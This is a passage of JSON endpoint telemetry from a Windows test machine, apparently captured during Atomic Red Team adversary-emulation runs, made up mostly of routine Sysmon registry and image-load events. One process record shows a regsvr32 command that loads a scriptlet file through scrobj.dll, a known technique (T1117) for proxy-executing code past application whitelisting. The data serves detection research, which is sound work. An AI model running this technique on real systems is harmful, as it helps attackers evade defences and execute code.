"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "inetmib1.dll", - "image_path": "C:\\Windows\\System32\\inetmib1.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "subtype": "terminate", - "timestamp": 131883573233240000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "file", - "file_name": "ARP.EXE-6A72334A.pf", - "file_path": "C:\\Windows\\Prefetch\\ARP.EXE-6A72334A.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573233240000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 2008, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573233240000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B8115401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4768, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573233400000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "event_type": "process", - "pid": 4768, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573233390000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-001054185401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7980, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573235480000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235420000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "command_line": "regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3596, - "ppid": 7980, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "create", - "timestamp": 131883573235570000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573235580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 